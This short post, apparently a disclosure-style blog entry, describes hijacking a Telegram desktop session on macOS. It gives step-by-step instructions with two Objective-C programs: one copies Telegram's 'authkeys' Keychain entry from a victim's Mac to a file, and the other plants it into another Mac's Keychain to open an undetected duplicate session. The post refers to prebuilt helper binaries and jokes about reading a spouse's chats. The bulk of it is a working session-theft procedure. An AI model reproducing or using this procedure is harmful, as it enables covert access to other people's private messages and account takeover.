Malicious ‘shadow’ sessions in Telegram

Actions on Macbook A(lice):

  1. Extract Telegram data from the Keychain:
     a) run ./tg_telegram_get
     It writes Telegram keychain data to file /tmp/tgdata
     b) compile ObjectiveC code and run it.
#import <Foundation/Foundation.h>
#import “SSKeychain.h”
int main(int argc, const char * argv[]) {

// get
NSData *d = [SSKeychain passwordDataForService:@”Telegram” account:@”authkeys”];
[d writeToFile:@”/tmp/tgdata” atomically:true];

return 0;

You will be prompted to allow the access to the Keychain, but you are NOT prompted for any password to do it. lol

2) Copy /tmp/tgdata to another device (USB?)

Actions on Macbook B(ob)

0) Copy tgdata from USB to /tmp/tgdata
1) We need to set Telegram data to the keychain:
 a) Just run binary file ./tg_telegram_set
 b) or compile it:

#import <Foundation/Foundation.h>
#import “SSKeychain.h”
int main(int argc, const char * argv[]) {

// set
NSData *fileData = [[NSFileManager defaultManager] contentsAtPath:@”/tmp/tgdata”];
[SSKeychain setPasswordData:fileData forService:@”Telegram” account:@”authkeys”];

return 0;

2) Start
3) HOLY SHI~ Where is a device detection? Is this the most secured messenger ever made?

Is this a bug? A feature? There SHOULD be the device check on every run.
Up to you.

P.S. Please, do not use it to read your wife’s chats. Just trust her :)